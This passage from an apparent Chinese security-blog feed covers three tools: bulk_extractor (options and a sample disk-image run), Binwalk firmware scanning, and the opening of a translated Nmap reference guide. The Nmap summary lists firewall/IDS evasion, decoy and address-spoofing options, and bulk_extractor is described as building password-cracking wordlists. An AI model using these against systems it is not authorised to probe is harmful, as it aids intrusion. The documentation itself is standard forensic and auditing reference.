清除输出目录</div><div class="line"></div><div class="line">扫描控制：</div><div class="line">   -P &lt;dir&gt;       - 指定一个插件目录</div><div class="line">                    默认目录包括/usr/local/lib/bulk_extractor，/usr/lib/bulk_extractor和</div><div class="line">                    BE_PATH环境变量</div><div class="line">   -e &lt;scanner&gt;     启用扫描器 - -e all   全部启用</div><div class="line">   -x &lt;scanner&gt;     禁用扫描器 - -x all   全部禁用</div><div class="line">   -E &lt;scanner&gt;   - 关闭除指定扫描器以外的所有扫描器</div><div class="line">                   （与-x all -e &lt;scanner&gt;效果一样）</div><div class="line">                    注意：-e，-x和-E命令按顺序执行</div><div class="line">                    例如：&apos;-E gzip -e facebook&apos;只运行gzip和facebook</div><div class="line">   -S name = value - 将批量提取器选项名称设置为值</div><div class="line"></div><div class="line"></div><div class="line">可设置选项（及其默认值）：</div><div class="line">   -S work_start_work_end = YES                   在report.xml文件中记录每个扫描器的工作开始和结束时间</div><div class="line">   -S enable_histograms = YES                     禁用生成直方图</div><div class="line">   -S debug_histogram_malloc_fail_frequency = 0   设置大于零记录内存分配失败直方图</div><div class="line">   -S hash_alg = md5                              指定用于所有哈希计算的哈希算法</div><div class="line">   -S dup_data_alerts =NO                         重复数据未处理时通知</div><div class="line">   -S write_feature_files = YES                   写入特征文件</div><div class="line">   -S write_feature_sqlite3 = NO                  将特征文件写入report.sqlite3</div><div class="line">   -S report_read_errors = YES                    报告读取错误</div><div class="line">   -S carve_net_memory = NO                       提取网络内存结构（net）</div><div class="line">   -S word_min = 6                                最小字大小（wordlist）</div><div class="line">   -S word_max = 14                               最大字大小（wordlist）</div><div class="line">   -S max_word_outfile_size = 100000000           输出文件的最大大小（wordlist）</div><div class="line">   -S wordlist_use_flatfiles = YES                覆盖SQL设置并对wordlist（wordlist）使用flatfiles</div><div class="line">   -S ssn_mode = 0                                0=正常格式; 1=不需要SSN; 2=去掉破折号（accts）</div><div class="line">   -S min_phone_digits = 7                        手机所需的数字（accts）</div><div class="line">   -S exif_debug = 0                              读取exif信息（exif）</div><div class="line">   -S jpeg_carve_mode = 1                         0=不提取; 1=雕刻编码提取; 2=全部提取（exif）</div><div class="line">   -S min_jpeg_size = 1000                        将被雕刻的最小的JPEG流（exif）</div><div class="line">   -S zip_min_uncompr_size = 6                    ZIP未压缩对象的最小大小（zip）</div><div class="line">   -S zip_max_uncompr_size = 268435456            ZIP未压缩对象的最大大小（zip）</div><div class="line">   -S zip_name_len_max = 1024                     ZIP组件的最大名称filename（zip）</div><div class="line">   -S unzip_carve_mode = 1                        0=不提取; 1=雕刻编码提取; 2=全部提取（zip）</div><div class="line">   -S rar_find_components = YES                   搜索RAR组件（rar）</div><div class="line">   -S rar_find_volumes = YES                      搜索RAR卷（rar）</div><div class="line">   -S unrar_carve_mode = 1                        0=不提取; 1=雕刻编码提取; 2=全部提取（rar）</div><div class="line">   -S gzip_max_uncompr_size = 268435456           解压缩GZIP对象的最大大小（gzip）</div><div class="line">   -S pdf_dump = NO                               转储PDF缓冲区的内容（pdf）</div><div class="line">   -S pdf_dump = NO                               转储PDF缓冲区的内容（msxml）</div><div class="line">   -S winpe_carve_mode = 1                        0=不提取; 1=雕刻编码提取; 2=全部提取（winpe）</div><div class="line">   -S opt_weird_file_size = 157286400             FAT32扫描（windir）的阈值</div><div class="line">   -S opt_weird_file_size2 = 536870912            FAT32扫描（windir）的阈值</div><div class="line">   -S opt_weird_cluster_count = 67108864          FAT32扫描（windir）的阈值</div><div class="line">   -S opt_weird_cluster_count2 = 268435456        FAT32扫描（windir）的阈值</div><div class="line">   -S opt_max_bits_in_attrib = 3                  忽略更多属性设置的FAT32条目（windirs）</div><div class="line">   -S opt_max_weird_count = 2                     忽略奇怪的FAT32条目（windirs）</div><div class="line">   -S opt_last_year = 2022                        忽略晚于此FAT32条目（windirs）</div><div class="line">   -S xor_mask = 255                              设置XOR掩码值，十进制格式（xor）</div><div class="line">   -S sqlite_carve_mode = 2                       0=不提取; 1=雕刻编码提取; 2=全部提取（sqlite）</div><div class="line"></div><div class="line">以下扫描默认禁用;启用使用-e命令：</div><div class="line">   -e base16   - 启用扫描base16</div><div class="line">   -e facebook - 启用扫描facebook</div><div class="line">   -e outlook  - 启用扫描outlook</div><div class="line">   -e sceadan  - 启用扫描sceadan</div><div class="line">   -e wordlist - 启用扫描wordlist</div><div class="line">   -e xor      - 启用扫描xor</div><div class="line"></div><div class="line">以下扫描默认启用;禁用使用-x命令：</div><div class="line">   -x accts    - 禁用扫描程序</div><div class="line">   -x aes      - 禁用扫描aes</div><div class="line">   -x base64   - 禁用扫描base64</div><div class="line">   -x elf      - 禁用扫描elf</div><div class="line">   -x mail     - 禁用扫描邮件</div><div class="line">   -x exif     - 禁用扫描exif</div><div class="line">   -x find     - 禁用扫描发现</div><div class="line">   -x gps      - 禁用扫描gps</div><div class="line">   -x gzip     - 禁用扫描gzip</div><div class="line">   -x hiberfile- 禁用扫描hiberfile</div><div class="line">   -x httplogs - 禁用扫描httplogs</div><div class="line">   -x json     - 禁用扫描json</div><div class="line">   -x kml      - 禁用扫描kml</div><div class="line">   -x msxml    - 禁用扫描msxml</div><div class="line">   -x net      - 禁用扫描net</div><div class="line">   -x pdf      - 禁用扫描pdf</div><div class="line">   -x rar      - 禁用扫描rar</div><div class="line">   -x sqlite   - 禁用扫描sqlite</div><div class="line">   -x vcard    - 禁用扫描vcard</div><div class="line">   -x windirs  - 禁用扫描windirs</div><div class="line">   -x winlnk   - 禁用扫描winlnk</div><div class="line">   -x winpe    - 禁用扫描winpe</div><div class="line">   -x zip      - 禁用扫描zip</div><div class="line">   -x winprefetch - 禁用扫描winprefetch</div></pre></td></tr></table></figure><p></p><h2 id="0x02-示例"><a href="#0x02-示例" class="headerlink" title="0x02 示例"></a>0x02 示例</h2><p>分析映像文件后，将结果导出到输出目录（-o bulk-out）（xp-laptop-2005-07-04-1430.img）：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div></pre></td><td class="code"><pre><div class="line">root@kali:~# bulk_extractor -o bulk-out xp-laptop-2005-07-04-1430.img</div><div class="line">bulk_extractor version 1.6.0-dev</div><div class="line">Hostname: kali</div><div class="line">Input file: xp-laptop-2005-07-04-1430.img</div><div class="line">Output directory: bulk-out</div><div class="line">Disk Size: 536715264</div><div class="line">Threads: 1</div><div class="line">Phase 1.</div><div class="line">13:02:46 Offset 0MB (0.00%) Done in n/a at 13:02:45</div><div class="line">13:03:39 Offset 67MB (12.50%) Done in  0:06:14 at 13:09:53</div><div class="line">13:04:43 Offset 134MB (25.01%) Done in  0:05:50 at 13:10:33</div><div class="line">13:04:55 Offset 201MB (37.51%) Done in  0:03:36 at 13:08:31</div><div class="line">13:06:01 Offset 268MB (50.01%) Done in  0:03:15 at 13:09:16</div><div class="line">13:06:48 Offset 335MB (62.52%) Done in  0:02:25 at 13:09:13</div><div class="line">13:07:04 Offset 402MB (75.02%) Done in  0:01:25 at 13:08:29</div><div class="line">13:07:20 Offset 469MB (87.53%) Done in  0:00:39 at 13:07:59</div><div class="line">All Data is Read; waiting for threads to finish...</div><div class="line">Time elapsed waiting for 1 thread to finish:</div><div class="line">     (please wait for another 60 min .)</div><div class="line">Time elapsed waiting for 1 thread to finish:</div><div class="line">    6 sec (please wait for another 59 min 54 sec.)</div><div class="line">Thread 0: Processing 520093696</div><div class="line"></div><div class="line">Time elapsed waiting for 1 thread to finish:</div><div class="line">    12 sec (please wait for another 59 min 48 sec.)</div><div class="line">Thread 0: Processing 520093696</div><div class="line"></div><div class="line">Time elapsed waiting for 1 thread to finish:</div><div class="line">    18 sec (please wait for another 59 min 42 sec.)</div><div class="line">Thread 0: Processing 520093696</div><div class="line"></div><div class="line">Time elapsed waiting for 1 thread to finish:</div><div class="line">    24 sec (please wait for another 59 min 36 sec.)</div><div class="line">Thread 0: Processing 520093696</div><div class="line"></div><div class="line">Time elapsed waiting for 1 thread to finish:</div><div class="line">    30 sec (please wait for another 59 min 30 sec.)</div><div class="line">Thread 0: Processing 520093696</div><div class="line"></div><div class="line">All Threads Finished!</div><div class="line">Producer time spent waiting: 335.984 sec.</div><div class="line">Average consumer time spent waiting: 0.143353 sec.</div><div class="line">*******************************************</div><div class="line">** bulk_extractor is probably CPU bound. **</div><div class="line">**    Run on a computer with more cores  **</div><div class="line">**      to get better performance.       **</div><div class="line">*******************************************</div><div class="line">Phase 2. Shutting down scanners</div><div class="line">Phase 3. Creating Histograms</div><div class="line">   ccn histogram...   ccn_track2 histogram...   domain histogram...</div><div class="line">   email histogram...   ether histogram...   find histogram...</div><div class="line">   ip histogram...   tcp histogram...   telephone histogram...</div><div class="line">   url histogram...   url microsoft-live...   url services...</div><div class="line">   url facebook-address...   url facebook-id...   url searches...</div><div class="line"></div><div class="line">Elapsed time: 378.5 sec.</div><div class="line">Overall performance: 1.418 MBytes/sec.</div><div class="line">Total email features found: 899</div></pre></td></tr></table></figure><p></p>]]></content>
    
    <summary type="html">
    
      #0X00-介绍0X00 介绍
bulk_extractor是从数字证据文件中提取诸如电子邮件地址，信用卡号，URL和其他类型的信息的功能的程序。
它是一个有用的取证调查工具，可以用于许多任务，如恶意软件和入侵调查，身份调查和网络调查，以及图像分析和密码破解。 该程序提供了几个不寻常的功能：

1.发现其他工具发现不了的信息，如电子邮件地址，URL和信用卡号码，得益于它能处理压缩数据（如ZIP，PDF和GZIP文件）以及不完整或部分损坏的数据。 它可以从压缩数据的片段中提取JPEG文件，办公文档和其他类型的文件 ，还可以自动检测并提取加密的RAR文件。
2.根据数据中发现的所有单词构建单词列表，甚至可以是在未分配空间的压缩文件中的数据。 这些单词列表可用于密码破解。
3.多线程的; 速度快节约时间
4.分析完之后创建直方图，显示电子邮件地址，URL，域名，搜索关键词和其他类型的信息。


bulk_extractor可以对磁盘映像，文件或文件目录进行分析，并在不分析文件系统或文件系统结构的情况下提取有用的信息。
输入被分割成页面并由一个或多个扫描器处理。 结果存储在特征文件中，可以使用其他自动化工具轻松检查，解析或处理。
bulk_extractor还创建了它所发现的特征的直方图。 这样非常有用，因为诸如电子邮件地址和网络搜索关键词的功能往往很常见且重要。
除了上述功能之外，bulk_extractor还包括以下功能：

5.具有浏览特征文件中存储的功能以及启动bulk_extractor扫描的图形用户界面的Bulk Extractor Viewer
6.少量用于对特征文件进行额外分析的python程序
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="forensics" scheme="https://hackfun.org/tags/forensics/"/>
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="取证分析" scheme="https://hackfun.org/tags/%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90/"/>
    
      <category term="bulk-extractor" scheme="https://hackfun.org/tags/bulk-extractor/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux取证分析之Binwalk</title>
    <link href="https://hackfun.org/2017/09/07/Kali-Linux%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90%E4%B9%8BBinwalk/"/>
    <id>https://hackfun.org/2017/09/07/Kali-Linux取证分析之Binwalk/</id>
    <published>2017-09-06T23:15:00.000Z</published>
    <updated>2017-10-02T19:22:31.968Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-Binwalk介绍"><a href="#0x00-Binwalk介绍" class="headerlink" title="0x00 Binwalk介绍"></a>0x00 Binwalk介绍</h2><p>Binwalk是用于搜索给定二进制镜像文件以获取嵌入的文件和代码的工具。 具体来说，它被设计用于识别嵌入固件镜像内的文件和代码。 Binwalk使用libmagic库，因此它与Unix文件实用程序创建的魔数签名兼容。 Binwalk还包括一个自定义魔数签名文件，其中包含常见的诸如压缩/存档文件，固件头，Linux内核，引导加载程序，文件系统等的固件映像中常见文件的改进魔数签名。<br><a id="more"></a></p><p><a href="http://binwalk.org/" target="_blank" rel="external">主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/binwalk.git;a=summary" target="_blank" rel="external">仓库</a></p><ul><li>作者：Craig Heffner</li><li>证书：MIT</li></ul><h2 id="0x01-功能"><a href="#0x01-功能" class="headerlink" title="0x01 功能"></a>0x01 功能</h2><p>一个固件分析工具<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div></pre></td><td class="code"><pre><div class="line">root@kali:~# binwalk -h</div><div class="line"></div><div class="line">Binwalk v2.1.1</div><div class="line">Craig Heffner，http://www.binwalk.org</div><div class="line"></div><div class="line">用法：binwalk [选项] [文件1] [文件2] [文件3] ...</div><div class="line"></div><div class="line">扫描选项：</div><div class="line">    -B，-- signature         扫描目标文件的常见文件签名</div><div class="line">    -R，--raw = &lt;str&gt;        扫描目标文件的指定字符序列</div><div class="line">    -A，--opcodes            扫描目标文件中常见可执行代码</div><div class="line">    -m，--magic = &lt;file&gt;     指定要使用的自定义魔数签名文件</div><div class="line">    -b，--dumb               禁用智能签名关键字</div><div class="line">    -I，--invalid            显示结果标记为无效</div><div class="line">    -x，--exclude = &lt;str&gt;    排除与&lt;str&gt;匹配的结果</div><div class="line">    -y，--include = &lt;str&gt;    只显示匹配&lt;str&gt;的结果</div><div class="line"></div><div class="line">提取选项：</div><div class="line">    -e，--extract                  自动提取已知的文件类型</div><div class="line">    -D，--dd = &lt;type：ext：cmd&gt;    提取&lt;type&gt;签名，为文件扩展名为&lt;ext&gt;，然后执行&lt;cmd&gt;</div><div class="line">    -M，--matryoshka               递归扫描提取的文件</div><div class="line">    -d，--depth = &lt;int&gt;            限制matryoshka递归深度（默认值：8级深）</div><div class="line">    -C，--directory = &lt;str&gt;        将文件/文件夹提取到自定义目录（默认值：当前工作目录）</div><div class="line">    -j，--size = &lt;int&gt;             限制每个提取的文件的大小</div><div class="line">    -n，--count = &lt;int&gt;            限制提取文件的数量</div><div class="line">    -r，--rm                       提取后删除刻录文件</div><div class="line">    -z，--carve                    从文件中读取数据，但不执行提取实用程序</div><div class="line"></div><div class="line">熵分析选项：</div><div class="line">    -E，--entropy           计算文件熵</div><div class="line">    -F，--fast              计算更快，但不太详细的熵分析</div><div class="line">    -J，--save              将熵图保存为PNG图像</div><div class="line">    -Q，--nlegend           从熵图图中省略图例</div><div class="line">    -N，--nplot             不生成熵图</div><div class="line">    -H，--high = &lt;float&gt;    设置上升沿熵触发阈值（默认值：0.95）</div><div class="line">    -L，--low = &lt;float&gt;     设置下降沿熵触发阈值（默认值：0.85）</div><div class="line"></div><div class="line">原始压缩选项：</div><div class="line">    -X， --deflate          扫描原始deflate压缩流</div><div class="line">    -Z， --lzma             扫描原始LZMA压缩流</div><div class="line">    -P， --partial          浅度扫描，速度更快</div><div class="line">    -S， --stop             找到第一个结果后停止扫描</div><div class="line"></div><div class="line">二进制差异选项：</div><div class="line">    -W，--hexdump           执行文件或文件的hexdump/diff</div><div class="line">    -G，--green             只显示包含所有文件中相同字节的行</div><div class="line">    -i，--red               仅显示包含所有文件中不同字节的行</div><div class="line">    -U，--blue              只显示一些文件中包含不同字节的行</div><div class="line">    -w，--terse             只显示第一个文件的十六进制转储</div><div class="line"></div><div class="line">一般选项：</div><div class="line">    -l，--length = &lt;int&gt;    要扫描的字节数</div><div class="line">    -o，--offset = &lt;int&gt;    以此偏移开始扫描</div><div class="line">    -O，--base = &lt;int&gt;      向所有打印的偏移量添加基址</div><div class="line">    -K，--block = &lt;int&gt;     设置文件块大小</div><div class="line">    -g，--swap = &lt;int&gt;      扫描前每n个字节反转一次</div><div class="line">    -f，--log = &lt;file&gt;      将结果记录到文件</div><div class="line">    -c，--csv               将结果记录到CSV格式的文件中</div><div class="line">    -t，--term              格式化输出以适合终端窗口</div><div class="line">    -q，--quiet             禁止输出</div><div class="line">    -v，--verbose           详细输出</div><div class="line">    -h，--help              显示帮助</div><div class="line">    -a，--finclude = &lt;str&gt;  只扫描名称与此正则表达式匹配的文件</div><div class="line">    -p，--fexclude = &lt;str&gt;  不扫描名称与此正则表达式匹配的文件</div><div class="line">    -s，--status = &lt;int&gt;    启用指定端口上的状态服务器</div></pre></td></tr></table></figure><p></p><h2 id="0x02-用法示例"><a href="#0x02-用法示例" class="headerlink" title="0x02 用法示例"></a>0x02 用法示例</h2><p>在给定的固件文件（dd-wrt.v24-13064_VINT_mini.bin）上运行文件签名扫描（-B）：</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">root@kali:~# binwalk -B dd-wrt.v24-13064_VINT_mini.bin</div><div class="line"></div><div class="line">DECIMAL     HEX         DESCRIPTION</div><div class="line">-------------------------------------------------------------------------------------------------------------------</div><div class="line">0           0x0         TRX firmware header, little endian, header size: 28 bytes, image size: 2945024 bytes, CRC32: 0x4D27FDC4 flags: 0x0, version: 1</div><div class="line">28          0x1C        gzip compressed data, from Unix, NULL date: Wed Dec 31 19:00:00 1969, max compression</div><div class="line">2472        0x9A8       LZMA compressed data, properties: 0x6E, dictionary size: 2097152 bytes, uncompressed size: 2084864 bytes</div><div class="line">622592      0x98000     Squashfs filesystem, little endian, DD-WRT signature, version 3.0, size: 2320835 bytes,  547 inodes, blocksize: 131072 bytes, created: Mon Nov  2 07:24:06 2009</div></pre></td></tr></table></figure>]]></content>
    
    <summary type="html">
    
      #0X00-BINWALK介绍0X00 BINWALK介绍
Binwalk是用于搜索给定二进制镜像文件以获取嵌入的文件和代码的工具。 具体来说，它被设计用于识别嵌入固件镜像内的文件和代码。
Binwalk使用libmagic库，因此它与Unix文件实用程序创建的魔数签名兼容。
Binwalk还包括一个自定义魔数签名文件，其中包含常见的诸如压缩/存档文件，固件头，Linux内核，引导加载程序，文件系统等的固件映像中常见文件的改进魔数签名。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="forensics" scheme="https://hackfun.org/tags/forensics/"/>
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="binwalk" scheme="https://hackfun.org/tags/binwalk/"/>
    
      <category term="取证分析" scheme="https://hackfun.org/tags/%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90/"/>
    
  </entry>
  
  <entry>
    <title>Nmap参考指南</title>
    <link href="https://hackfun.org/2017/04/24/Nmap%E5%8F%82%E8%80%83%E6%8C%87%E5%8D%97/"/>
    <id>https://hackfun.org/2017/04/24/Nmap参考指南/</id>
    <published>2017-04-24T08:59:00.000Z</published>
    <updated>2017-10-02T20:10:15.633Z</updated>
    
    <content type="html"><![CDATA[<p>项目地址：<a href="https://github.com/sunnyelf/Nmap-Reference-Guide" target="_blank" rel="external">Nmap-Reference-Guide</a></p><h1 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h1><ul><li><a href="#译注">译注</a></li><li><a href="#名称">名称</a></li><li><a href="#命令">命令</a></li><li><a href="#描述">描述</a></li><li><a href="#选项概要">选项概要</a></li><li><a href="#目标说明">目标说明</a></li><li><a href="#主机发现">主机发现</a></li><li><a href="#端口扫描基础">端口扫描基础</a></li><li><a href="#端口扫描技术">端口扫描技术</a></li><li><a href="#端口说明和扫描顺序">端口说明和扫描顺序</a></li><li><a href="#服务和版本探测">服务和版本探测</a></li><li><a href="#操作系统探测">操作系统探测</a></li><li><a href="#时间和性能">时间和性能</a></li><li><a href="#防火墙ids躲避和欺骗">防火墙/IDS躲避和欺骗</a></li><li><a href="#输出">输出</a></li><li><a href="#其它选项">其它选项</a></li><li><a href="#运行时交互">运行时交互</a></li><li><a href="#实例">实例</a></li><li><a href="#bugs">Bugs</a></li><li><a href="#作者">作者</a></li><li><a href="#法律事项版权许可证担保缺出口限制">法律事项(版权、许可证、担保(缺)、出口限制)</a></li></ul><a id="more"></a><h1 id="译注"><a href="#译注" class="headerlink" title="译注"></a>译注</h1><p>该Nmap参考指南中文版由<a href="mailto:fyang1024@gmail.com" target="_blank" rel="external">Fei Yang</a>和<a href="mailto:lilei_721@6611.org" target="_blank" rel="external">Lei Li</a> 从<a href="http://www.insecure.org/nmap/man/" target="_blank" rel="external">英文版本</a>翻译而来。 我们希望这将使全世界使用中文的人们更了解Nmap，但我们不能保证该译本和官方的 英文版本一样完整，也不能保证同步更新。 它可以在<a href="http://creativecommons.org/licenses/by/2.5/" target="_blank" rel="external">Creative Commons Attribution License</a>许可证下被修改并重新发布。</p><h1 id="名称"><a href="#名称" class="headerlink" title="名称"></a>名称</h1><p>nmap — 网络探测工具和安全/端口扫描器</p><h1 id="命令"><a href="#命令" class="headerlink" title="命令"></a>命令</h1><p>nmap [ &lt;扫描类型&gt; …] [ &lt;选项&gt; ] { &lt;扫描目标说明&gt; }</p><h1 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h1><p><strong>注意</strong>:本文档描述了Nmap版本4.50。最新文档以英语 <a href="https://nmap.org/book/man.html" target="_blank" rel="external">https://nmap.org/book/man.html</a>提供。</p><p>Nmap (“Network Mapper(网络映射器)”) 是一款开放源代码的 网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络，当然用它扫描单个 主机也没有问题。Nmap以新颖的方式使用原始IP报文来发现网络上有哪些主机，那些 主机提供什么服务(应用程序名和版本)，那些服务运行在什么操作系统(包括版本信息)， 它们使用什么类型的报文过滤器/防火墙，以及一堆其它功能。虽然Nmap通常用于安全审核， 许多系统管理员和网络管理员也用它来做一些日常的工作，比如查看整个网络的信息， 管理服务升级计划，以及监视主机和服务的运行。</p><p>Nmap输出的是扫描目标的列表，以及每个目标的补充信息，至于是哪些信息则依赖于所使用的选项。 “所感兴趣的端口表格”是其中的关键。那张表列出端口号，协议，服务名称和状态。状态可能是 open(开放的)，filtered(被过滤的)， closed(关闭的)，或者unfiltered(未被过滤的)。 Open(开放的)意味着目标机器上的应用程序正在该端口监听连接/报文。 filtered(被过滤的) 意味着防火墙，过滤器或者其它网络障碍阻止了该端口被访问，Nmap无法得知 它是 open(开放的) 还是 closed(关闭的)。 closed(关闭的) 端口没有应用程序在它上面监听，但是他们随时可能开放。 当端口对Nmap的探测做出响应，但是Nmap无法确定它们是关闭还是开放时，这些端口就被认为是 unfiltered(未被过滤的) 如果Nmap报告状态组合 open|filtered 和 closed|filtered时，那说明Nmap无法确定该端口处于两个状态中的哪一个状态。 当要求进行版本探测时，端口表也可以包含软件的版本信息。当要求进行IP协议扫描时 (-sO)，Nmap提供关于所支持的IP协议而不是正在监听的端口的信息。</p><p>除了所感兴趣的端口表，Nmap还能提供关于目标机的进一步信息，包括反向域名，操作系统猜测，设备类型，和MAC地址。</p><p>一个典型的Nmap扫描如例 1 “一个典型的Nmap扫描”所示。在这个例子中，唯一的选项是-A， 用来进行操作系统及其版本的探测，-T4 可以加快执行速度，接着是两个目标主机名。</p><p><strong>例 1. 一个典型的Nmap扫描</strong></p><pre><code># nmap -A -T4 scanme.nmap.orgNmap scan report for scanme.nmap.org (74.207.244.221)Host is up (0.029s latency).rDNS record for 74.207.244.221: li86-221.members.linode.comNot shown: 995 closed portsPORT     STATE    SERVICE     VERSION22/tcp   open     ssh         OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)| ssh-hostkey: 1024 8d:60:f1:7c:ca:b7:3d:0a:d6:67:54:9d:69:d9:b9:dd (DSA)|_2048 79:f8:09:ac:d4:e2:32:42:10:49:d3:bd:20:82:85:ec (RSA)80/tcp   open     http        Apache httpd 2.2.14 ((Ubuntu))|_http-title: Go ahead and ScanMe!646/tcp  filtered ldp1720/tcp filtered H.323/Q.9319929/tcp open     nping-echo  Nping echoDevice type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6.39OS details: Linux 2.6.39Network Distance: 11 hopsService Info: OS: Linux; CPE: cpe:/o:linux:kernelTRACEROUTE (using port 53/tcp)HOP RTT      ADDRESS[Cut first 10 hops for brevity]11  17.65 ms li86-221.members.linode.com (74.207.244.221)Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds</code></pre><h1 id="选项概要"><a href="#选项概要" class="headerlink" title="选项概要"></a>选项概要</h1><p>当 Nmap 不带选项运行时，该选项概要会被输出，最新的版本在这里 <a href="http://www.insecure.org/nmap/data/nmap.usage.txt" target="_blank" rel="external">http://www.insecure.org/nmap/data/nmap.usage.txt</a>。它帮助人们记住最常用的选项，但不 能替代本手册其余深入的文档，一些晦涩的选项甚至不在这里。</p><pre><code>Usage: nmap [Scan Type(s)] [Options] {target specification}TARGET SPECIFICATION:    Can pass hostnames, IP addresses, networks, etc.    Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0-255.0-255.1-254    -iL &lt;inputfilename&gt;: Input from list of hosts/networks    -iR &lt;num hosts&gt;: Choose random targets    --exclude &lt;host1[,host2][,host3],...&gt;: Exclude hosts/networks    --excludefile &lt;exclude_file&gt;: Exclude list from fileHOST DISCOVERY:    -sL: List Scan - simply list targets to scan    -sP: Ping Scan - go no further than determining if host is online    -P0: Treat all hosts as online -- skip host discovery    -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery probes to given ports    -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes    -n/-R: Never do DNS resolution/Always resolve [default: sometimes resolve]SCAN TECHNIQUES:    -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans    -sN/sF/sX: TCP Null, FIN, and Xmas scans    --scanflags &lt;flags&gt;: Customize TCP scan flags    -sI &lt;zombie host[:probeport]&gt;: Idlescan    -sO: IP protocol scan    -b &lt;ftp relay host&gt;: FTP bounce scanPORT SPECIFICATION AND SCAN ORDER:    -p &lt;port ranges&gt;: Only scan specified ports    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080    -F: Fast - Scan only the ports listed in the nmap-services file)    -r: Scan ports consecutively - don&apos;t randomizeSERVICE/VERSION DETECTION:    -sV: Probe open ports to determine service/version info    --version-light: Limit to most likely probes for faster identification    --version-all: Try every single probe for version detection    --version-trace: Show detailed version scan activity (for debugging)OS DETECTION:    -O: Enable OS detection    --osscan-limit: Limit OS detection to promising targets    --osscan-guess: Guess OS more aggressivelyTIMING AND PERFORMANCE:    -T[0-6]: Set timing template (higher is faster)    --min-hostgroup/max-hostgroup &lt;msec&gt;: Parallel host scan group sizes    --min-parallelism/max-parallelism &lt;msec&gt;: Probe parallelization    --min_rtt_timeout/max-rtt-timeout/initial-rtt-timeout &lt;msec&gt;: Specifies probe round trip time.    --host-timeout &lt;msec&gt;: Give up on target after this long    --scan-delay/--max_scan-delay &lt;msec&gt;: Adjust delay between probesFIREWALL/IDS EVASION AND SPOOFING:    -f; --mtu &lt;val&gt;: fragment packets (optionally w/given MTU)    -D &lt;decoy1,decoy2[,ME],...&gt;: Cloak a scan with decoys    -S &lt;IP_Address&gt;: Spoof source address    -e &lt;iface&gt;: Use specified interface    -g/--source-port &lt;portnum&gt;: Use given port number    --data-length &lt;num&gt;: Append random data to sent packets    --ttl &lt;val&gt;: Set IP time-to-live field    --spoof-mac &lt;mac address, prefix, or vendor name&gt;: Spoof your MAC addressOUTPUT:    -oN/-oX/-oS/-oG &lt;file&gt;: Output scan results in normal, XML, s|&lt;rIpt kIddi3, and Grepable format, respectively, to the given filename.    -oA &lt;basename&gt;: Output in the three major formats at once    -v: Increase verbosity level (use twice for more effect)    -d[level]: Set or increase debugging level (Up to 9 is meaningful)    --packet-trace: Show all packets sent and received    --iflist: Print host interfaces and routes (for debugging)    --append-output: Append to rather than clobber specified 